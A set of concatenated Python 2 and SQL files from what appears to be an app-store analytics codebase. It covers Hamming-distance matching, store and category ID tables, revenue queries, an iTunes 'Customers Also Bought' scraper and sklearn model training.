Generate random hexadecimal string of length n_bytes.
:param n_bytes: length of hexadecimal string in bytes
:return: hexadecimal string
"""
return urandom(n_bytes).encode('hex')
def create_rand_df(n_rows=10):
"""
Generate DataFrame with random two hashes and labels.
:param n_rows: length of DataFrame
:return: DataFrame
"""
df = pd.DataFrame(np.arange(n_rows), columns=['index'])
df['hash_1'] = df['index'].apply(lambda x: rand_hex_string(16))
df['hash_2'] = df['index'].apply(lambda x: rand_hex_string(16))
df['label'] = np.random.randint(0, 2, size=len(df))
return df.set_index('index')
def compute_hamming_distance(hex_str_1, hex_str_2):
"""
Compute Hamming distance between two hexadecimal strings.
:param hex_str_1: hexadecimal string
:param hex_str_2: hexadecimal string
:return: hamming distance
"""
return Le.hamming(bin(int('f'+hex_str_1, 16)), bin(int('f'+hex_str_2, 16)))
def update_df_hamming(df, cols=COLS):
"""
Update df with column containing the computed Hamming distance between the two hash columns.
:param df: DataFrame with two hash columns
:param cols: df column names
:return: updated df with Hamming column
"""
df[cols['hamming']] = df[cols['hashes']].apply(lambda x: compute_hamming_distance(x[cols['hashes'][0]],
x[cols['hashes'][1]]),
axis=1)
return df
def compute_euclidean_color_distance(colors_1, colors_2):
"""
Compute Euclidean distance between the rows of two numpy matrices/
:param colors_1: numpy matrix (size m x n)
:param colors_2: numpy matrix (size m x n)
:return: numpy matrix with Euclidean distance (size m x 1)
"""
return np.sqrt(np.sum((colors_1.astype(float) - colors_2.astype(float))**2, axis=1))
def update_df_color_distance(df, cols=COLS):
"""
:param df: DataFrame with two (x len(colors[ii])) color columns
:param cols: df column names
:return: update df with Euclidean distance column
"""
difference = df[cols['colors'][0]].values - df[cols['colors'][1]].values
df[cols['color_distance']] = np.sqrt(np.sum(difference.astype(float) ** 2, axis=1))
return df
def show_hamming_statistics(df, cols=COLS):
"""
Show Hamming distance statistic.
:param df: DataFrame with hamming distance column
:param cols: df column names
"""
df[COLS['hamming']].hist(bins=50)
print 'distance statistics'
print '\tmean:\t'+str(df[cols['hamming']].mean())
print '\tstd:\t'+str(df[cols['hamming']].std())
def compute_f_score(precision, recall, beta=1):
"""
Compute F-score for given beta.
:param precision: precision of classifier
:param recall: recall of classifier
:return: F-score for given beta, precision and recall
"""
return (1+beta**2)*precision*recall/(beta**2*precision+recall)
def compute_optimal_threshold(df, beta=1, ROC_curve=False, curve_data=False, plot_name='', cols=COLS, metric='hamming'):
"""
:param df: DataFrame with labels and hamming distance
:param beta: F-score parameter beta
:param ROC_curve: plotting ROC curve
:param curve_data: include curve data in result
:param cols: df column names
:param metric: Metric to compute threshold for (should correspond to the metric column in cols)
:return: results and updated df
"""
# we count below threshold as positive therefore we use -df.hamming
fpr, tpr, roc_threshold = me.roc_curve(df[cols['label']].values, -df[cols[metric]])
precision, recall, thresholds = me.precision_recall_curve(df[cols['label']].values, -df[cols[metric]])
precision, recall = precision[:-1], recall[:-1] # drop last values, they do not correspond with a threshold
# compute the F scores for the different precision and recall values
f_scores = compute_f_score(precision, recall, beta=beta)
f_max_idx = np.nanargmax(f_scores)
results = {
'threshold': -thresholds[f_max_idx],
'F_score': f_scores[f_max_idx],
'beta': beta,
'PPV': precision[f_max_idx],
'TPR': recall[f_max_idx],
'AUC': me.auc(fpr, tpr)
}
if curve_data:
results['Curve_fpr'] = fpr
results['Curve_tpr'] = tpr
# update data frame with classification results column
df[cols['result']] = (df[cols['hamming']] <= results['threshold'])*1
# plot the ROC curve and add point corresponding to optimal threshold
plt.ioff()
if ROC_curve or plot_name != '':
fig = plt.figure()
plt.plot(fpr, tpr, label='ROC curve (AUC = %0.2f)' % results['AUC'])
roc_idx = np.where(roc_threshold==-results['threshold'])[0][0]
plt.plot(fpr[roc_idx], tpr[roc_idx], 'ro', label='threshold = %0.2f'%results['threshold'])
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC curve')
plt.legend(loc="lower right")
if ROC_curve:
fig.show()
if plot_name != '':
plt.savefig(plot_name, format='png')
plt.close(fig)
return df, results<file_sep>/evaluation/py/config.py
'''
Created on Apr 16, 2013
@author: perezrafael
'''
config_ios = {
## It's recommended to symlink the file here.
'unit_feeds': {'Downloads': [0, 1, 100, 101],
'USD': [2, 102]},
'db_info': {'host': '192.168.8.54',
'db_name': 'ios_dwh',
'username': 'aa'}
}
config_android = {
'script_path': '../external/est_android.py'
}
IOS_MARKETS_DICT = { 0:'iPhone',
1:'iPhone',
2:'iPhone',
100:'iPad',
101:'iPad',
102:'iPad'
}
IOS_TYPES_DICT = { 0:'Free',
1:'Paid',
2:'Grossing',
100:'Paid',
101:'Free',
102:'Grossing'
}
IOS_US_STORE_ID = 143441
IOS_WW_STORE_ID = 0
IOS_ROW_STORE_ID = 1
IOS_MSFT_STORE_ID = 2
IOS_WESTERN_EU_STORE_ID = 3
IOS_APAC_STORE_ID = 4
IOS_NORTH_AMERICA_STORE_ID = 5
IOS_SOUTH_EAST_ASIA_STORE_ID = 6
IOS_STORES_DICT = {143441: u'United States',
143442: u'France',
143443: u'Germany',
143444: u'United Kingdom',
143445: u'Austria',
143446: u'Belgium',
143447: u'Finland',
143448: u'Greece',
143449: u'Ireland',
143450: u'Italy',
143451: u'Luxembourg',
143452: u'Netherlands',
143453: u'Portugal',
143454: u'Spain',
143455: u'Canada',
143456: u'Sweden',
143457: u'Norway',
143458: u'Denmark',
143459: u'Switzerland',
143460: u'Australia',
143461: u'New Zealand',
143462: u'Japan',
143463: u'Hong Kong',
143464: u'Singapore',
143465: u'China',
143466: u'South Korea',
143467: u'India',
143468: u'Mexico',
143469: u'Russia',
143470: u'Taiwan',
143471: u'Vietnam',
143472: u'South Africa',
143473: u'Malaysia',
143474: u'Philippines',
143475: u'Thailand',
143476: u'Indonesia',
143477: u'Pakistan',
143478: u'Poland',
143479: u'Saudi Arabia',
143480: u'Turkey',
143481: u'United Arab Emirates',
143482: u'Hungary',
143483: u'Chile',
143485: u'Panama',
143486: u'Sri Lanka',
143487: u'Romania',
143489: u'Czech Republic',
143491: u'Israel',
143493: u'Kuwait',
143494: u'Croatia',
143495: u'Costa Rica',
143496: u'Slovakia',
143497: u'Lebanon',
143498: u'Qatar',
143499: u'Slovenia',
143501: u'Colombia',
143502: u'Venezuela',
143503: u'Brazil',
143504: u'Guatemala',
143505: u'Argentina',
143506: u'El Salvador',
143507: u'Peru',
143508: u'Dominican Republic',
143509: u'Ecuador',
143510: u'Honduras',
143511: u'Jamaica',
143512: u'Nicaragua',
143513: u'Paraguay',
143514: u'Uruguay',
143515: u'Macau',
143516: u'Egypt',
143517: u'Kazakhstan',
143518: u'Estonia',
143519: u'Latvia',
143520: u'Lithuania',
143521: u'Malta',
143523: u'Moldova',
143524: u'Armenia',
143525: u'Botswana',
143526: u'Bulgaria',
143528: u'Jordan',
143529: u'Kenya',
143530: u'Macedonia',
143531: u'Madagascar',
143532: u'Mali',
143533: u'Mauritius',
143534: u'Niger',
143535: u'Senegal',
143536: u'Tunisia',
143537: u'Uganda',
143538: u'Anguilla',
143539: u'Bahamas',
143540: u'Antigua and Barbuda',
143541: u'Barbados',
143542: u'Bermuda',
143543: u'British Virgin Islands',
143544: u'Cayman Islands',
143545: u'Dominica',
143546: u'Grenada',
143547: u'Montserrat',
143548: u'St. Kitts and Nevis',
143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines',
143551: u'Trinidad and Tobago',
143552: u'Turks and Caicos',
143553: u'Guyana',
143554: u'Suriname',
143555: u'Belize',
143556: u'Bolivia',
143557: u'Cyprus',
143558: u'Iceland',
143559: u'Bahrain',
143560: u'Brunei',
143561: u'Nigeria',
143562: u'Oman',
143563: u'Algeria',
143564: u'Angola',
143565: u'Belarus',
143566: u'Uzbekistan',
143568: u'Azerbaijan',
143571: u'Yemen',
143572: u'Tanzania',
143573: u'Ghana',
143575: u'Albania',
143576: u'Benin',
143577: u'Bhutan',
143578: u'Burkina Faso',
143579: u'Cambodia',
143580: u'Cape Verde',
143581: u'Chad',
143582: u'Congo',
143583: u'Fiji',
143584: u'Gambia',
143585: u'Guinea-Bissau',
143586: u'Kyrgyzstan',
143587: u'Laos',
143588: u'Liberia',
143589: u'Malawi',
143590: u'Mauritania',
143591: u'Micronesia',
143592: u'Mongolia',
143593: u'Mozambique',
143594: u'Namibia',
143484: u'Nepal',
143595: u'Palau',
143597: u'Papua New Guinea',
143598: u'Sao Tome and Principe',
143599: u'Seychelles',
143600: u'Sierra Leone',
143601: u'Solomon Islands',
143602: u'Swaziland',
143603: u'Tajikistan',
143604: u'Turkmenistan',
143492: u'Ukraine',
143605: u'Zimbabwe'}
#IOS_STORES_DICT_REVERSE = {y:x for x,y in IOS_STORES_DICT.iteritems()}
IOS_CATEGORIES_DICT = {36: u'Overall',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Action',
7002: u'Adventure',
7003: u'Arcade',
7004: u'Board',
7005: u'Card',
7006: u'Casino',
7007: u'Dice',
7008: u'Educational',
7009: u'Family',
7010: u'Kids',
7011: u'Music',
7012: u'Puzzle',
7013: u'Racing',
7014: u'Role Playing',
7015: u'Simulation',
7016: u'Sports',
7017: u'Strategy',
7018: u'Trivia',
7019: u'Word'}
#IOS_CATEGORIES_DICT_REVERSE = {y:x for x,y in IOS_CATEGORIES_DICT.iteritems()}
IOS_FEEDS_DICT = {
0: "IPHONE_FREE",
1: "IPHONE_PAID",
2: "IPHONE_GROSSING",
100: "IPAD_PAID",
101: "IPAD_FREE",
102: "IPAD_GROSSING"
}
#IOS_FEEDS_DICT_REVERSE = {y:x for x,y in IOS_FEEDS_DICT.iteritems()}
ANDROID_US_STORE_ID = 10
ANDROID_WW_STORE_ID = 1000
ANDROID_ROW_STORE_ID = 1001
ANDROID_MSFT_STORE_ID = 1002
ANDROID_WESTERN_EU_STORE_ID = 1003
ANDROID_APAC_STORE_ID = 1004
ANDROID_NORTH_AMERICA_STORE_ID = 1005
ANDROID_SOUTH_EAST_ASIA_STORE_ID = 1006
ANDROID_STORES_DICT = {ANDROID_WW_STORE_ID: u'ALL', # world wide
ANDROID_ROW_STORE_ID: u'ROW', # Rest of world other than US
ANDROID_MSFT_STORE_ID: u'ALL MSFT', # MSFT all stores, Now it's the same as ALL
ANDROID_WESTERN_EU_STORE_ID: u'Western Europe',
ANDROID_APAC_STORE_ID: u'APAC',
ANDROID_NORTH_AMERICA_STORE_ID: u'North America',
ANDROID_SOUTH_EAST_ASIA_STORE_ID: u'South East Asia',
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria',
36: u'Czech Republic',
37: u'Hungary',
38: u'Denmark',
39: u'Ireland',
40: u'Israel',
41: u'New Zealand',
42: u'Norway',
43: u'Portugal',
44: u'Romania'}
#ANDROID_STORES_DICT_REVERSE = {y:x for x,y in ANDROID_STORES_DICT.iteritems()}
ANDROID_STORE_SHORTCUTS_TO_ID_DICT = {'AU':1,
'CA':2,
'CN':3,
'DE':4,
'ES':5,
'FR':6,
'GB':7,
'IT':8,
'JP':9,
'US':10,
'BE':11,
'CH':12,
'CL':13,
'ZA':14,
'VN':15,
'HK':16,
'AR':17,
'BR':18,
'IN':19,
'FI':20,
'ID':21,
'RU':22,
'NL':23,
'MY':24,
'TR':25,
'MX':26,
'KR':27,
'PL':28,
'TH':29,
'TW':30,
'PH':31,
'SG':32,
'EG':33,
'SE':34,
'AT':35,
'CZ':36,
'HU':37,
'DK':38,
'IE':39,
'IL':40,
'NZ':41,
'NO':42,
'PT':43,
'RO':44,
'SK':45,
'GR':46,
'BG':47,
'UA':48,
'AE':49,
'KW':50,
#'SA':51, # Disabled because of poor data points.
}
ANDROID_CATEGORIES_DICT = {1: u'OVERALL',
2: u'GAME',
3: u'ARCADE',
4: u'BRAIN',
5: u'CARDS',
6: u'CASUAL',
7: u'GAME_WALLPAPER',
8: u'RACING',
9: u'SPORTS_GAMES',
10: u'GAME_WIDGETS',
11: u'APPLICATION',
12: u'BOOKS_AND_REFERENCE',
13: u'BUSINESS',
14: u'COMICS',
15: u'COMMUNICATION',
16: u'EDUCATION',
17: u'ENTERTAINMENT',
18: u'FINANCE',
19: u'HEALTH_AND_FITNESS',
20: u'LIBRARIES_AND_DEMO',
21: u'LIFESTYLE',
22: u'APP_WALLPAPER',
23: u'MEDIA_AND_VIDEO',
24: u'MEDICAL',
25: u'MUSIC_AND_AUDIO',
26: u'NEWS_AND_MAGAZINES',
27: u'PERSONALIZATION',
28: u'PHOTOGRAPHY',
29: u'PRODUCTIVITY',
30: u'SHOPPING',
31: u'SOCIAL',
32: u'SPORTS',
33: u'TOOLS',
34: u'TRANSPORTATION',
35: u'TRAVEL_AND_LOCAL',
36: u'WEATHER',
37: u'APP_WIDGETS'}
#ANDROID_CATEGORIES_DICT_REVERSE = {y:x for x,y in ANDROID_CATEGORIES_DICT.iteritems()}
ANDROID_FEEDS_DICT = {
0: 'ANDROID_FREE',
1: 'ANDROID_PAID',
2: 'ANDROID_GROSSING',
}
#ANDROID_FEEDS_DICT_REVERSE = {y:x for x,y in ANDROID_FEEDS_DICT.iteritems()}
<file_sep>/financial-product-benchmark/combined-sample_size/Retrieve_q2_gross.sql
set @country = 'JP';
DROP TEMPORARY TABLE IF EXISTS temp.top_100;
CREATE TEMPORARY TABLE temp.top_100
AS
SELECT
cn.iso_code,
a.external_id,
a.name,
a.publisher,
e.application_id,
e.appstore_instance_id,
sum(e.revenue) as revenue
FROM
estimates_dev.estimates_quarter_appstore e
JOIN appstore.appstore_instances ai ON ai.id = e.appstore_instance_id
JOIN appstore.countries cn ON cn.id = ai.country_id
JOIN appstore.applications a ON a.id = e.application_id
WHERE
e.date = 20140401 AND cn.iso_code in (@country) AND ai.device_id in (1,2)
GROUP BY
cn.iso_code, e.application_id
ORDER BY
iso_code, revenue DESC
LIMIT 100
;
DROP TEMPORARY TABLE IF EXISTS temp.date_select;
CREATE TEMPORARY TABLE temp.date_select
(PRIMARY KEY(date))
select
distinct r.date
from
appstore.rankings r
WHERE
(r.date < 20140701 AND r.date>=20140401)
;
DROP TEMPORARY TABLE IF EXISTS temp.all_select;
CREATE TEMPORARY TABLE temp.all_select
(PRIMARY KEY(date, appstore_instance_id,application_id, type ))
select
distinct r.date,
t.appstore_instance_id,
t.application_id,
'gross' as type,
t.revenue,
t.iso_code,
t.name,
t.publisher
from
temp.date_select r
join temp.top_100 t
;
select
a.name,
a.publisher,
a.revenue,
d.application_id,
d.appstore_instance_id,
MAX(d.monitor_app),
d.type
from
estimates.application_data_appstore d
join temp.all_select a
on a.date = d.date and a.appstore_instance_id = d.appstore_instance_id and a.application_id = d.application_id and a.type = d.type
group by
application_id
order by
revenue desc
<file_sep>/financial-product-benchmark/single-model/lib/my_functions.py
import glob
import pandas as pd
overall_category = 36
feed_dict = {'IPHONE_FREE':'iphone_free', 'IPAD_FREE':'ipad_free',
'IPHONE_PAID':'iphone_paid', 'IPAD_PAID':'ipad_paid',
'IPHONE_GROSSING':'iphone_revenue', 'IPAD_GROSSING':'ipad_revenue'}
def parse_debug_files_ios(input_path, include_custom_added=False):
files = glob.glob(input_path)
data = None
for file in files:
print 'parsing '+file+'...'
debug_data = pd.read_csv(file)
if include_custom_added:
sel = ((debug_data.Rank==1)&(debug_data.Customize.astype(str)=='A')&(debug_data.Category==overall_category))\
|((debug_data.Customize.astype(str)!='A')&(~debug_data['App ID'].isnull()))
else:
sel = ((debug_data.Customize.astype(str)!='A')&(~debug_data['App ID'].isnull()))
debug_data = debug_data[sel]
debug_data = debug_data[['Store','Feed','End Date','Day','App ID','Value','Customize']]
debug_data.ix[debug_data.Customize.isnull()|(debug_data.Customize.astype(str)=='R'),'Customize']='N'
debug_data.ix[debug_data.Customize=='A','App ID']=1
debug_data["Feed"] = debug_data.Feed.apply(lambda x: feed_dict[x])
debug_data.columns = ['store_id','feed','end_date','day','app_id','actual','customized']
debug_data.app_id = debug_data.app_id.astype(int)
debug_data.actual = debug_data.actual.astype(int)
if data is None:
data = debug_data
else:
data = data.append(debug_data, ignore_index=True)
print 'dropping duplicates...'
data.drop_duplicates(inplace=True)
print 'aggregating...'
data_agg = data.groupby(['store_id','feed','end_date','app_id'], as_index=False)['actual'].sum()
data_agg['customized'] = data.groupby(['store_id','feed','end_date','app_id'], as_index=False).last()['customized']
data_agg.actual = data_agg.actual.astype(int)
print 'done!'
return data_agg
def parse_estimates_ios(input_path, estimate_column='estimate'):
files = glob.glob(input_path)
data = None
for file in files:
print 'parsing '+file+'...'
if data is None:
data = pd.read_csv(file)
else:
data = data.append(pd.read_csv(file), ignore_index=True)
print 'melting...'
data = pd.melt(data, id_vars=['app_id','store_id','end_date'],
value_vars = ['iphone_free','iphone_paid','iphone_revenue','ipad_free','ipad_paid','ipad_revenue'])
data.columns = ['app_id','store_id','end_date','feed',estimate_column]
print 'done!'
return data
<file_sep>/customers-also-bought/lib/customer_scrapers/customer_scrapers/spiders/apple.py
# -*- coding: utf-8 -*-
import json
import pandas
import re
import scrapy
from bs4 import BeautifulSoup
from ..items import CustomerScrapersItem
from scrapy.http import Request
from scrapy.utils.project import get_project_settings
ISO_CODES = {
143441: u'us',
143455: u'ca',
143462: u'jp'
}
class AppleSpider(scrapy.Spider):
"""
Spider to crawl iTunes pages and scrape the 'Customers Also Bought' list.
"""
name = "apple"
country_external_id = get_project_settings()['COUNTRY_EXTERNAL_ID']
start_ids_file_path = 'start_ids_{iso_code}.csv'.format(iso_code=ISO_CODES[country_external_id])
start_app_ids = pandas.read_csv(start_ids_file_path, index_col=0)['external_id'].tolist()
allowed_domains = ["itunes.apple.com"]
base_url = 'https://itunes.apple.com/{iso_code}/app/name/id'.format(iso_code=ISO_CODES[country_external_id])
base_suffix = '?mt=8'
start_urls = [base_url + str(current_id) + base_suffix for current_id in start_app_ids]
n_page_to_visit = 1
max_n_page_to_visit = 1E9
parsed_ids = set(start_app_ids)
def parse(self, response):
"""
Parse a app details page.
:param response: Response object
:return: Yields items (processed) and new Requests (leading to new calls of this method)
"""
(external_id, customers_also_bought, app_name, has_in_app_purchases,
price, genre_names) = self._parse_json_response(response)
self.parsed_ids.add(external_id) # storing retrieved external_id in parsed_ids
# Yield all external_id cab_external_id combinations
for cab_rank, cab_external_id in enumerate(customers_also_bought):
yield self._construct_item(external_id, app_name, has_in_app_purchases, price, genre_names, cab_rank,
cab_external_id)
# Yield new URLS to follow from customers_also_bought
for external_id in customers_also_bought:
if (external_id not in self.parsed_ids) and (self.n_page_to_visit < self.max_n_page_to_visit):
self.parsed_ids.add(external_id)
self.n_page_to_visit += 1
new_url = self._get_new_url(external_id)
yield Request(new_url, callback=self.parse)
def _parse_json_response(self, response):
"""
Parse the JSON response of the iTunes page.
:param response: Response object
:return: (external ID, list with external IDs of similar apps)
"""
soup = BeautifulSoup(response.body)
page_data_script = soup.findAll(text=re.compile("its\.serverData"))
target_string = re.search(r'^\s*its\.serverData\s*=\s*({.*?})\s*$',
page_data_script[0], flags=re.DOTALL | re.MULTILINE).group(1)
json_page_data = json.loads(target_string)
app_id = self._get_external_id(json_page_data)
app_details = self._get_app_details(json_page_data, app_id)
app_name = self._get_app_name(app_details)
has_in_app_purchases = self._get_has_in_app_purchases(app_details)
customers_also_bought = self._get_customers_also_bought_list(json_page_data)
price = self._get_price(app_details)
genre_names = self._get_genre_names(app_details)
return app_id, customers_also_bought, app_name, has_in_app_purchases, price, genre_names
def _get_external_id(self, json_page_data):
"""
Parse JSON page data and return external ID.
:param json_page_data: JSON data
:return: External ID
"""
return int(json_page_data['storePlatformData']['product-dv-product']['results'].keys()[0])
def _get_app_details(self, json_page_data, app_id):
"""
Get the app details from a JSON dict with the page data.
:param json_page_data: JSON data
:param app_id: Int with external app ID
:return: Dictionary with app details
"""
return json_page_data['storePlatformData']['product-dv-product']['results'][str(app_id)]
def _get_app_name(self, app_details):
"""
Get name from app_details.
:param app_details: Dictionary with app details
:return: App name
"""
try:
app_name = app_details['name']
except KeyError:
app_name = None
return app_name
def _get_has_in_app_purchases(self, app_details):
"""
Get has_in_app_purchases from app_details.
:param app_details: Dictionary with app details
:return: Boolean
"""
try:
has_in_app_purchases = app_details['hasInAppPurchases']
except KeyError:
has_in_app_purchases = None
return has_in_app_purchases
def _get_customers_also_bought_list(self, json_page_data):
"""
Get list with IDs of apps that the customer also bought.
:param json_page_data: JSON data
:return: list with external IDs
"""
software_page_data = json_page_data['pageData']['softwarePageData']
try:
json_page_data['storePlatformData']['product-dv-product']['results'].keys()
if 'customersAlsoBoughtApps' in software_page_data.keys():
customers_also_bought = software_page_data['customersAlsoBoughtApps']
else:
customers_also_bought = []
except KeyError:
customers_also_bought = []
return customers_also_bought
def _get_price(self, app_details):
"""
Get price from app_details
:param app_details: Dictionary with app details
:return: Price of app
"""
try:
price = app_details['offers'][0]['price']
except KeyError:
price = None
return price
def _get_genre_names(self, app_details):
"""
Get genre names (categories) from app_details
:param app_details: Dictionary with app details
:return: List with genre names
"""
try:
genre_names = app_details['genreNames']
except KeyError:
genre_names = []
return genre_names
def _construct_item(self, external_id, app_name, has_in_app_purchases, price, genre_names, cab_rank,
cab_external_id):
"""
Construct a new Item with scraped data.
:param external_id: ID of scraped app
:param cab_external_id: list with IDs of apps that customers also bought
:param cab_rank: Rank of the app
:return: Item object
"""
item = CustomerScrapersItem()
item['country_external_id'] = self.country_external_id
item['external_id'] = external_id
item['cab_external_id'] = cab_external_id
item['cab_rank'] = cab_rank
item['price'] = price
item['genre_names'] = genre_names
item['app_name'] = app_name
item['has_in_app_purchases'] = has_in_app_purchases
return item
def _get_new_url(self, external_id):
"""
Construct new URL from an external ID.
:param external_id: External ID
:return: URL to scrape
"""
return self.base_url + str(external_id) + self.base_suffix
<file_sep>/evaluation/py/test_category_rank_range_errors.py
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
DATA_DIR = '/Users/perezrafael/appannie/data/benchmark'
def test_static_ranks():
file = '%s/benchmark_data_143441_2013-07-01.csv.bz2'%DATA_DIR
df = pd.read_csv(file, compression='bz2')
df = df[df['actual']>0]
df['iphone_estimate'] = df['iphone_estimate'].fillna(0.0)
df['ipad_estimate'] = df['ipad_estimate'].fillna(0.0)
df['estimate'] = df['iphone_estimate'] + df['ipad_estimate']
df['abs_error'] = (df['actual'] - df['estimate']).abs()
df['rel_error'] = df['abs_error']/df['actual']
iphone_df = df.drop_duplicates(cols=['store_id', 'category_id', 'feed_id', 'app_id', 'iphone_rank'])
iphone_df = iphone_df[iphone_df['iphone_rank']>0]
iphone_df = iphone_df[np.isnan(iphone_df['ipad_rank']) == True]
winner_top60 = 0.0
winner_everything_else = 0.0
apps = []
for n, g in iphone_df.groupby(['store_id', 'feed_id', 'app_id']):
describe = g.describe()
if describe['rel_error']['count']<2.0:
continue
if describe['iphone_rank']['min']>60:
continue
if describe['iphone_rank']['max']<60:
continue
print g
sorted = g.sort(columns='rel_error', ascending=True)
g['sbe_error'] = describe['rel_error']['mean']
g['max_error_difference'] = describe['rel_error']['max'] - describe['rel_error']['min']
g['max_rank_difference'] = describe['iphone_rank']['max'] - describe['iphone_rank']['min']
g['is_min_error'] = 'no'
g['is_min_error'][g['rel_error'] == g['rel_error'].min()] = 'yes'
g['is_min_error_in_top60'] = 'no'
g['is_min_error_in_top60'][(g['is_min_error']=='yes') & (g['iphone_rank']<61)] = 'yes'
if sorted['iphone_rank'].values[0] == g['iphone_rank'].min():
winner_top60 += 1.0
g['lowest_error'] = 'Top60'
else:
winner_everything_else +=1.0
g['lowest_error'] = 'NoTop60'
apps.append(g)
print winner_top60
print winner_everything_else
apps = pd.concat(apps)
apps.to_csv('test_app_rank_error.csv', index=False)
#ipad_df = df.drop_duplicates(cols=['store_id', 'category_id', 'feed_id', 'app_id', 'ipad_rank'])
#ipad_df = ipad_df[ipad_df['ipad_rank']>0
pass
if __name__ == '__main__':
main()
<file_sep>/audience/related_apps/create_app_category.sql
CREATE TABLE app_category (
app_id integer,
category_id integer,
period_start date,
period_end date,
PRIMARY KEY (app_id,category_id, period_start, period_end)
);
<file_sep>/exact-matching-improvement/lib/feature_company.py
__author__ = 'jjanssen'
import config as cf
suffix_list = ['AG','srl','spa','SA','kft','sl','sas','ab','INC','llc','Games',
'ltd','Software','Apps','Media','Studios','Mobile','Studio',
'Technologies','Limited','Solutions','GmbH','Union','Labs','Bank',
'Entertainment','Digital','Technology','Co','Group','Interactive',
'App','Publishing','Productions','game','Pvt','Development','Corporation',
'Systems','Team','Tech','Company','Federal','Soft','Design','Corp','Services',
'Magazine','Network','Android','COLTD','Srl','International','Dev','A','Lab','web','Consulting','Pty']
suffix_list = [e.lower() for e in suffix_list]
def clean_punctuation(text):
result = []
if text is not None:
text_to_list = text.lower().split()
for text_element in text_to_list:
text_element = text_element.decode('utf-8')
result.append(text_element.translate(cf.removal_translate_table))
text = " ".join(result)
return text
def clean_company_suffix(text):
result = []
if text is not None:
company_name_to_list = text.lower().split()
for name_element in company_name_to_list:
if name_element not in suffix_list:
result.append(name_element)
text = " ".join(result)
return text
def clean_company(row):
if row['company'] is not None:
text = row['company']
text_cleaned_punctuation = clean_punctuation(text)
row['cleaned_company'] = clean_company_suffix(text_cleaned_punctuation)
else:
row['cleaned_company'] = row['company']
return row<file_sep>/aa_au_model/correction/model.py
__author__ = 'hgriffioen'
import pandas as pd
import pickle
import process
import sklearn
import utils
def split_train_test(y, do_split_stratified=True, **kwargs):
"""
Get indexes to split y in train and test sets.
:param y: Labels of samples
:param do_split_stratified: Use StratifiedShuffleSplit (else ShuffleSplit)
:param kwargs: Input params for StratifiedShuffleSplit or ShuffleSplit
:return: (train indexes, test indexes)
"""
if do_split_stratified:
data_splitter = sklearn.cross_validation.StratifiedShuffleSplit(y, n_iter=1,
**kwargs)
else:
data_splitter = sklearn.cross_validation.ShuffleSplit(y, n_iter=1,
**kwargs)
train_ix, test_ix = data_splitter.__iter__().next()
return train_ix, test_ix
def train_model(X, y, estimator, random_state, test_size=0.2, n_folds=5, **kwargs):
"""
Train a model, get test score and re-fit on all data.
:param X: Input data
:param y: Labels
:param estimator: Estimator to train
:param random_state: Random state for kfold
:param test_size: Size of test set
:param n_folds: Number of folds
:param kwargs: Keyword arguments for sklearn.grid_search.GridSearchCV
:return: Tuple with best estimator and test score
"""
train_ix, test_ix = split_train_test(y, test_size=test_size, random_state=random_state)
# Perform grid_search on training set.
kfold = sklearn.cross_validation.StratifiedKFold(y.iloc[train_ix], n_folds=n_folds, shuffle=True,
random_state=random_state)
grid = sklearn.grid_search.GridSearchCV(estimator, cv=kfold, **kwargs)
grid.fit(X.iloc[train_ix, :], y.iloc[train_ix])
# Determine score on test set.
test_score = grid.score(X.iloc[test_ix, :], y.iloc[test_ix])
best_model = grid.best_estimator_
best_model.fit(X, y) # Fit to all data.
return best_model, test_score
def get_model_path(start_date, end_date, modality):
"""
Get path to model to save to or load from.
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value used (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: string with file path
"""
period_str = '_'.join((start_date.strftime('%Y%m%d'),
end_date.strftime('%Y%m%d')))
modality_str = '_'.join(['%s=%s' % (key, val) for key, val in modality.items()])
file_name = '_'.join(('model', modality_str, period_str)) + '.pickle'
return 'data/model/' + file_name
def save_model(model_results, start_date, end_date, modality):
"""
Save model results to file. Path is determined using get_model_path().
:param model_results: Results to save
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value used (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: None
"""
model_path = get_model_path(start_date, end_date, modality)
with open(model_path, 'w') as f:
pickle.dump(model_results, f)
def load_model(start_date, end_date, modality):
"""
Load model results from file. Path is determined using get_model_path().
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value used (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: model results
"""
model_path = get_model_path(start_date, end_date, modality)
with open(model_path, 'r') as f:
model_results = pickle.load(f)
return model_results
def predict_joint_proba(data, estimator_1, estimator_2, bundle_ids_1=None, bundle_ids_2=None, joint_classes=None):
"""
Predict the joint independent probabilities for two estimators. Order of columns:
(not 1, not 2), (not 1, 2), (1, not 2), (1, 2)
:param data: Data to predict with
:param estimator_1: Object with method predict_proba
:param estimator_2: Object with method predict_proba
:param bundle_ids_1: Bundle ID's to use for alignment for estimator 1 (if None, don't align)
:param bundle_ids_1: Bundle ID's to use for alignment for estimator 2 (if None, don't align)
:param joint_classes: Joint classes to set as columns (default = ['0,0', '0,1', '1,0', '1,1'])
:return: DataFrame with joint probabilities
"""
if joint_classes is None:
